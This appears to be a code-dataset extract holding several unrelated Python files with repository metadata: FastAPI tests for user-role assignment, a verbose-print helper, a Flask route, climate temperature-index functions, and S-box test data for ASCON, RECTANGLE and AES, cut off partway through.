747c20c5bce0bc557449aa2375e4bb15c178cdc8
| 3,849
|
py
|
Python
|
tests/api/api_v1/test_user_roles.py
|
tsatsujnr139/fastapi-role-based-access-control-auth-service
|
6c6addb04edad80e167424e39574697008eb0e64
|
[
"MIT"
] | 47
|
2021-03-06T14:49:43.000Z
|
2022-03-05T12:18:59.000Z
|
tests/api/api_v1/test_user_roles.py
|
tsatsujnr139/fastapi-role-based-access-control-auth-service
|
6c6addb04edad80e167424e39574697008eb0e64
|
[
"MIT"
] | 5
|
2021-09-19T15:16:49.000Z
|
2022-01-26T15:47:48.000Z
|
tests/api/api_v1/test_user_roles.py
|
tsatsujnr139/fastapi-role-based-access-control-auth-service
|
6c6addb04edad80e167424e39574697008eb0e64
|
[
"MIT"
] | 15
|
2021-03-08T07:54:32.000Z
|
2022-03-09T13:57:23.000Z
|
from app import crud
from app.constants.role import Role
from app.core.config import settings
from app.schemas.user import UserCreate
from app.schemas.user_role import UserRoleCreate
from fastapi.testclient import TestClient
from sqlalchemy.orm import Session
from tests.utils.utils import random_email, random_lower_string
def test_assign_user_role_by_superadmin(
client: TestClient, superadmin_token_headers: dict, db: Session
) -> None:
username = random_email()
password = random_lower_string()
full_name = random_lower_string()
user_in = UserCreate(
email=username, password=password, full_name=full_name
)
user = crud.user.create(db, obj_in=user_in)
role = crud.role.get_by_name(db, name=Role.ACCOUNT_MANAGER["name"])
data = {"user_id": str(user.id), "role_id": str(role.id)}
r = client.post(
f"{settings.API_V1_STR}/user-roles",
headers=superadmin_token_headers,
json=data,
)
assert 200 <= r.status_code < 300
created_user_role = r.json()
user_role = crud.user_role.get_by_user_id(db, user_id=user.id)
assert user_role
assert str(user_role.role_id) == created_user_role["role_id"]
def test_assign_user_role_by_normal_user(
client: TestClient, superadmin_token_headers: dict, db: Session
) -> None:
username = random_email()
password = random_lower_string()
full_name = random_lower_string()
user_in = UserCreate(
email=username, password=password, full_name=full_name
)
user = crud.user.create(db, obj_in=user_in)
role = crud.role.get_by_name(db, name=Role.ACCOUNT_MANAGER["name"])
data = {"user_id": str(user.id), "role_id": str(role.id)}
r = client.post(
f"{settings.API_V1_STR}/user-roles",
headers=superadmin_token_headers,
json=data,
)
assert 200 <= r.status_code < 300
created_user_role = r.json()
user_role = crud.user_role.get_by_user_id(db, user_id=user.id)
assert user_role
assert str(user_role.role_id) == created_user_role["role_id"]
def test_update_user_role(
client: TestClient, superadmin_token_headers: dict, db: Session
) -> None:
username = random_email()
password = random_lower_string()
full_name = random_lower_string()
user_in = UserCreate(
email=username, password=password, full_name=full_name
)
user = crud.user.create(db, obj_in=user_in)
role = crud.role.get_by_name(db, name=Role.ACCOUNT_MANAGER["name"])
user_role_in = UserRoleCreate(user_id=user.id, role_id=role.id)
crud.user_role.create(db, obj_in=user_role_in)
new_role = crud.role.get_by_name(db, name=Role.ACCOUNT_ADMIN["name"])
data = {"role_id": str(new_role.id)}
r = client.put(
f"{settings.API_V1_STR}/user-roles/{user.id}",
headers=superadmin_token_headers,
json=data,
)
updated_user_role = r.json()
assert 200 <= r.status_code < 300
assert updated_user_role["role_id"] == str(new_role.id)
def test_update_user_role_by_unauthorized_user_fails(
client: TestClient, normal_user_token_headers: dict, db: Session
) -> None:
username = random_email()
password = random_lower_string()
full_name = random_lower_string()
user_in = UserCreate(
email=username, password=password, full_name=full_name
)
user = crud.user.create(db, obj_in=user_in)
role = crud.role.get_by_name(db, name=Role.ACCOUNT_MANAGER["name"])
user_role_in = UserRoleCreate(user_id=user.id, role_id=role.id)
crud.user_role.create(db, obj_in=user_role_in)
new_role = crud.role.get_by_name(db, name=Role.ACCOUNT_ADMIN["name"])
data = {"role_id": str(new_role.id)}
r = client.put(
f"{settings.API_V1_STR}/user-roles/{user.id}",
headers=normal_user_token_headers,
json=data,
)
assert r.status_code == 401
| 36.657143
| 73
| 0.706677
| 570
| 3,849
| 4.461404
| 0.122807
| 0.078647
| 0.060165
| 0.030672
| 0.83956
| 0.829335
| 0.788439
| 0.772316
| 0.772316
| 0.772316
| 0
| 0.007909
| 0.178748
| 3,849
| 104
| 74
| 37.009615
| 0.796583
| 0
| 0
| 0.739583
| 0
| 0
| 0.061055
| 0.038452
| 0
| 0
| 0
| 0
| 0.09375
| 1
| 0.041667
| false
| 0.083333
| 0.083333
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
748cab60059c9ef8d41b20df40b1703a9ee9ccde
| 760
|
py
|
Python
|
psynlp/helpers/builtins.py
|
Demfier/PsyNLP
|
e16952ce1bbbe9724071a009743654d11ae386d5
|
[
"MIT"
] | 5
|
2019-11-23T05:33:01.000Z
|
2021-12-30T22:37:43.000Z
|
psynlp/helpers/builtins.py
|
Demfier/PsyNLP
|
e16952ce1bbbe9724071a009743654d11ae386d5
|
[
"MIT"
] | 5
|
2018-04-10T10:31:22.000Z
|
2018-04-14T06:31:03.000Z
|
psynlp/helpers/builtins.py
|
Demfier/PsyNLP
|
e16952ce1bbbe9724071a009743654d11ae386d5
|
[
"MIT"
] | 1
|
2021-08-14T17:46:42.000Z
|
2021-08-14T17:46:42.000Z
|
import builtins as __builtin__
def init_verbose(verbose=False):
if not verbose:
__builtin__.verbose_print_1 = lambda *a, **k: None
__builtin__.verbose_print_2 = lambda *a, **k: None
__builtin__.verbose_print_3 = lambda *a, **k: None
elif verbose == 1:
__builtin__.verbose_print_1 = print
__builtin__.verbose_print_2 = lambda *a, **k: None
__builtin__.verbose_print_3 = lambda *a, **k: None
elif verbose == 2:
__builtin__.verbose_print_1 = print
__builtin__.verbose_print_2 = print
__builtin__.verbose_print_3 = lambda *a, **k: None
else:
__builtin__.verbose_print_1 = print
__builtin__.verbose_print_2 = print
__builtin__.verbose_print_3 = print
| 36.190476
| 58
| 0.668421
| 97
| 760
| 4.443299
| 0.206186
| 0.389791
| 0.529002
| 0.167053
| 0.786543
| 0.786543
| 0.786543
| 0.758701
| 0.730858
| 0.672854
| 0
| 0.02439
| 0.244737
| 760
| 20
| 59
| 38
| 0.726481
| 0
| 0
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.111111
| 0.666667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
77774ed700d7b2fcedafb2264a485bfb746a552c
| 91
|
py
|
Python
|
polls/views.py
|
r00m/flask-blueprint-quickstart
|
7c9dbeae20e4882eb887e1c88854c5f83e890f52
|
[
"MIT"
] | null | null | null |
polls/views.py
|
r00m/flask-blueprint-quickstart
|
7c9dbeae20e4882eb887e1c88854c5f83e890f52
|
[
"MIT"
] | null | null | null |
polls/views.py
|
r00m/flask-blueprint-quickstart
|
7c9dbeae20e4882eb887e1c88854c5f83e890f52
|
[
"MIT"
] | null | null | null |
from polls import blueprint
@blueprint.route('/')
def index():
return "Hello World!"
| 13
| 27
| 0.681319
| 11
| 91
| 5.636364
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175824
| 91
| 6
| 28
| 15.166667
| 0.826667
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 1
|
0
| 7
|
777cd98be4af74d61907b5f29ca27ee92b1266f4
| 221
|
py
|
Python
|
africanus/rime/cuda/__init__.py
|
JoshVStaden/codex-africanus
|
4a38994431d51510b1749fa0e4b8b6190b8b530f
|
[
"BSD-3-Clause"
] | 13
|
2018-04-06T09:36:13.000Z
|
2021-04-13T13:11:00.000Z
|
africanus/rime/cuda/__init__.py
|
JoshVStaden/codex-africanus
|
4a38994431d51510b1749fa0e4b8b6190b8b530f
|
[
"BSD-3-Clause"
] | 153
|
2018-03-28T14:13:48.000Z
|
2022-02-03T07:49:17.000Z
|
africanus/rime/cuda/__init__.py
|
JoshVStaden/codex-africanus
|
4a38994431d51510b1749fa0e4b8b6190b8b530f
|
[
"BSD-3-Clause"
] | 14
|
2018-03-29T13:30:52.000Z
|
2021-06-12T02:56:55.000Z
|
# flake8: noqa
from africanus.rime.cuda.beam import beam_cube_dde
from africanus.rime.cuda.feeds import feed_rotation
from africanus.rime.cuda.phase import phase_delay
from africanus.rime.cuda.predict import predict_vis
| 31.571429
| 51
| 0.846154
| 35
| 221
| 5.2
| 0.485714
| 0.285714
| 0.373626
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004975
| 0.090498
| 221
| 6
| 52
| 36.833333
| 0.900498
| 0.054299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
777d1729b6a670fc439712aae7df957bda909ea3
| 3,773
|
py
|
Python
|
climdex/temperature.py
|
weilin2018/pyclimdex
|
ccaf1ad3eda2d52b586dd4a3755be5eb9ba9a15b
|
[
"MIT"
] | 6
|
2021-01-11T14:52:23.000Z
|
2022-03-05T12:53:54.000Z
|
climdex/temperature.py
|
dawran/pyclimdex
|
c526e876016f61ee2fc1a659e68b6ef0f2e9cb24
|
[
"MIT"
] | null | null | null |
climdex/temperature.py
|
dawran/pyclimdex
|
c526e876016f61ee2fc1a659e68b6ef0f2e9cb24
|
[
"MIT"
] | 2
|
2020-03-14T00:44:45.000Z
|
2020-04-09T09:03:32.000Z
|
import xarray as xr
import numpy as np
import climdex.utils as utils
from typing import Union
def indices(time_dim='time', convert_units_fn=lambda x: x):
return TemperatureIndices(time_dim=time_dim, convert_units_fn=convert_units_fn)
class TemperatureIndices:
def __init__(self, time_dim='time', convert_units_fn=lambda x: x):
self.time_dim = time_dim
self.convert_units_fn = convert_units_fn
def annual_frost_days(self, X: Union[xr.DataArray, xr.Dataset], varname='MINT'):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.min(), time_dim=self.time_dim)
return (X_arr < self.convert_units_fn(0.0)).astype(X_arr.dtype).groupby(f'{self.time_dim}.year').sum()
def annual_tropical_nights(self, X: Union[xr.DataArray, xr.Dataset], varname='MINT'):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.min(), time_dim=self.time_dim)
return (X_arr > self.convert_units_fn(20.0)).astype(X_arr.dtype).groupby(f'{self.time_dim}.year').sum()
def annual_icing_days(self, X: Union[xr.DataArray, xr.Dataset], varname='MAXT'):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.max(), time_dim=self.time_dim)
return (X_arr < self.convert_units_fn(0.0)).astype(X_arr.dtype).groupby(f'{self.time_dim}.year').sum()
def annual_summer_days(self, X: Union[xr.DataArray, xr.Dataset], varname='MAXT'):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.max(), time_dim=self.time_dim)
return (X_arr > self.convert_units_fn(25.0)).astype(X_arr.dtype).groupby(f'{self.time_dim}.year').sum()
def annual_growing_season_length(self, X: Union[xr.DataArray, xr.Dataset], varname='MEANT'):
raise NotImplementedError()
def monthly_txx(self, X: Union[xr.DataArray, xr.Dataset], varname=None):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.max(), time_dim=self.time_dim)
return X.resample({self.time_dim: '1M'}).max()
def monthly_txn(self, X: Union[xr.DataArray, xr.Dataset], varname=None):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.max(), time_dim=self.time_dim)
return X.resample({self.time_dim: '1M'}).min()
def monthly_tnx(self, X: Union[xr.DataArray, xr.Dataset], varname=None):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.min(), time_dim=self.time_dim)
return X.resample({self.time_dim: '1M'}).max()
def monthly_tnn(self, X: Union[xr.DataArray, xr.Dataset], varname=None):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.min(), time_dim=self.time_dim)
return X.resample({self.time_dim: '1M'}).min()
def daily_temperature_range(self,
X1: Union[xr.DataArray, xr.Dataset],
X2: Union[xr.DataArray, xr.Dataset]=None,
min_varname='MINT',
max_varname='MAXT'):
X1_arr = utils.data_array_or_dataset_var(X1, var=min_varname)
X2_arr = utils.data_array_or_dataset_var(X2, var=max_varname)
X_min_arr = utils.resample_daily(X1_arr, lambda x: x.min(), time_dim=self.time_dim)
X_max_arr = utils.resample_daily(X2_arr, lambda x: x.max(), time_dim=self.time_dim)
return X_max_arr - X_min_arr
| 56.313433
| 111
| 0.675855
| 599
| 3,773
| 3.96828
| 0.1202
| 0.100126
| 0.092554
| 0.083298
| 0.805217
| 0.784182
| 0.760623
| 0.736222
| 0.720656
| 0.691207
| 0
| 0.00722
| 0.19242
| 3,773
| 67
| 112
| 56.313433
| 0.772891
| 0
| 0
| 0.407407
| 0
| 0
| 0.033121
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.074074
| 0.018519
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
77906d2463d7c579d380ef329f49798605124508
| 11,091
|
py
|
Python
|
packages/divprop/tests/test_sboxes.py
|
CryptoExperts/AC21-divprop-convexity
|
ed4fb715c484b12413a5c59e4f189bcc37889449
|
[
"MIT"
] | 4
|
2021-11-13T03:31:00.000Z
|
2022-02-25T02:02:58.000Z
|
packages/divprop/tests/test_sboxes.py
|
CryptoExperts/AC21-divprop-convexity
|
ed4fb715c484b12413a5c59e4f189bcc37889449
|
[
"MIT"
] | null | null | null |
packages/divprop/tests/test_sboxes.py
|
CryptoExperts/AC21-divprop-convexity
|
ed4fb715c484b12413a5c59e4f189bcc37889449
|
[
"MIT"
] | null | null | null |
from random import shuffle, randrange
def get_sboxes():
ret = []
name = 'ASCON'
n = m = 5
sbox = [4, 11, 31, 20, 26, 21, 9, 2, 27, 5, 8, 18, 29, 3, 6, 28, 30, 19, 7, 14, 0, 13, 17, 24, 16, 12, 1, 25, 22, 10, 15, 23]
dppt = ([0], [1, 2, 4, 8, 16], [1, 2, 4, 8, 16], [3, 4, 9, 10, 17, 18, 24], [2, 4, 8, 16], [3, 5, 6, 9, 10, 12, 17, 18, 20, 24], [3, 5, 6, 8, 17, 18, 20], [6, 9, 10, 12, 19, 20, 24], [1, 2, 4, 8, 16], [1, 6, 10, 12, 16], [3, 5, 6, 8, 17, 18, 20], [3, 5, 6, 9, 10, 12, 18, 20, 24], [3, 5, 8, 16], [3, 5, 9, 10, 12, 17, 18, 20, 24], [7, 9, 10, 12, 17, 18, 20, 24], [7, 9, 12, 20, 24], [1, 2, 8, 16], [2, 5, 9, 12, 17, 20, 24], [2, 5, 9, 12, 17, 20, 24], [3, 5, 10, 12, 18, 20, 25], [3, 5, 6, 9, 10, 12, 18, 20, 24], [6, 10, 13, 18, 21, 25, 28], [6, 9, 10, 18, 21, 24], [10, 23, 25], [1, 6, 10, 12, 16], [3, 5, 6, 10, 18, 20, 25], [3, 5, 6, 9, 10, 18, 20, 24], [3, 5, 10, 18, 20, 25], [3, 5, 9, 10, 18, 20, 24], [10, 18, 29], [7, 9, 10, 18, 24], [31])
ret.append((name, sbox, n, m, dppt))
name = 'RECTANGLE'
n = m = 4
sbox = [6, 5, 12, 10, 1, 14, 7, 9, 11, 0, 3, 13, 8, 15, 4, 2]
dppt = ([0], [1, 2, 4, 8], [1, 2, 4, 8], [1, 4, 10], [1, 2, 4, 8], [3, 4, 8], [3, 4, 8], [3, 4, 9], [1, 2, 4, 8], [3, 5, 6, 8], [2, 5, 8], [6, 11, 13], [3, 4, 8], [6, 10, 13], [3, 5, 8], [15])
ret.append((name, sbox, n, m, dppt))
name = 'AES'
n = m = 8
sbox = [99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43, 254, 215, 171, 118, 202, 130, 201, 125, 250, 89, 71, 240, 173, 212, 162, 175, 156, 164, 114, 192, 183, 253, 147, 38, 54, 63, 247, 204, 52, 165, 229, 241, 113, 216, 49, 21, 4, 199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226, 235, 39, 178, 117, 9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214, 179, 41, 227, 47, 132, 83, 209, 0, 237, 32, 252, 177, 91, 106, 203, 190, 57, 74, 76, 88, 207, 208, 239, 170, 251, 67, 77, 51, 133, 69, 249, 2, 127, 80, 60, 159, 168, 81, 163, 64, 143, 146, 157, 56, 245, 188, 182, 218, 33, 16, 255, 243, 210, 205, 12, 19, 236, 95, 151, 68, 23, 196, 167, 126, 61, 100, 93, 25, 115, 96, 129, 79, 220, 34, 42, 144, 136, 70, 238, 184, 20, 222, 94, 11, 219, 224, 50, 58, 10, 73, 6, 36, 92, 194, 211, 172, 98, 145, 149, 228, 121, 231, 200, 55, 109, 141, 213, 78, 169, 108, 86, 244, 234, 101, 122, 174, 8, 186, 120, 37, 46, 28, 166, 180, 198, 232, 221, 116, 31, 75, 189, 139, 138, 112, 62, 181, 102, 72, 3, 246, 14, 97, 53, 87, 185, 134, 193, 29, 158, 225, 248, 152, 17, 105, 217, 142, 148, 155, 30, 135, 233, 206, 85, 40, 223, 140, 161, 137, 13, 191, 230, 66, 104, 65, 153, 45, 15, 176, 84, 187, 22]
dppt = ([0], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [2, 4, 8, 16, 32, 64, 129], [3, 4, 8, 16, 32, 65, 66, 129, 130], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 32, 192], [1, 2, 4, 8, 16, 96, 192], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [2, 4, 8, 16, 32, 64, 129], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [2, 4, 8, 16, 64, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 128], [2, 4, 8, 16, 33, 65, 129, 224], [3, 8, 17, 18, 34, 48, 65, 68, 129, 132, 144, 224], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64], [1, 2, 4, 8, 16, 64, 160], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 32, 64], [1, 2, 4, 8, 16, 32, 192], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 64, 128], [2, 4, 8, 16, 33, 64, 128], [1, 2, 4, 8, 16, 96, 128], [1, 2, 4, 8, 16, 96, 128], [3, 4, 8, 16, 33, 34, 65, 96, 129, 130], [3, 6, 10, 12, 16, 33, 34, 36, 40, 68, 96, 130, 133, 136, 193], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 32, 192], [1, 2, 4, 16, 72, 136, 192], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 